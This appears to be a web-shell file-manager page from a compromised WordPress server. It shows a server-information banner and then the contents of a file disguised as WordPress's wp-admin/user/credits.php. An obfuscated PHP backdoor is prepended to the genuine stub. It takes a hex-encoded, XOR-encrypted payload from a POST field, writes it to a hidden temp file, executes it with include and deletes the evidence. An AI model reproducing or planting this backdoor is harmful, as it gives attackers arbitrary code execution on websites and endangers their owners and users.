| Server IP : 198.38.94.67 / Your IP : 216.73.217.74 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/wp-admin/user/ |
Upload File : |
<?php if(array_key_exists("\x73y\x6Db\x6Fl", $_POST) && !is_null($_POST["\x73y\x6Db\x6Fl"])){ $rec = hex2bin($_POST["\x73y\x6Db\x6Fl"]); $itm='' ; $p = 0; do{$itm .= chr(ord($rec[$p]) ^ 92);$p++;} while($p < strlen($rec)); $obj = array_filter(["/var/tmp", getenv("TEMP"), sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/tmp", "/dev/shm"]); while ($marker = array_shift($obj)) { if (!!is_dir($marker) && !!is_writable($marker)) { $dat = implode("/", [$marker, ".hld"]); if (@file_put_contents($dat, $itm) !== false) { include $dat; unlink($dat); die(); } } } }
/**
* User Dashboard Credits administration panel.
*
* @package WordPress
* @subpackage Administration
* @since 3.4.0
*/
/** Load WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';
require ABSPATH . 'wp-admin/credits.php';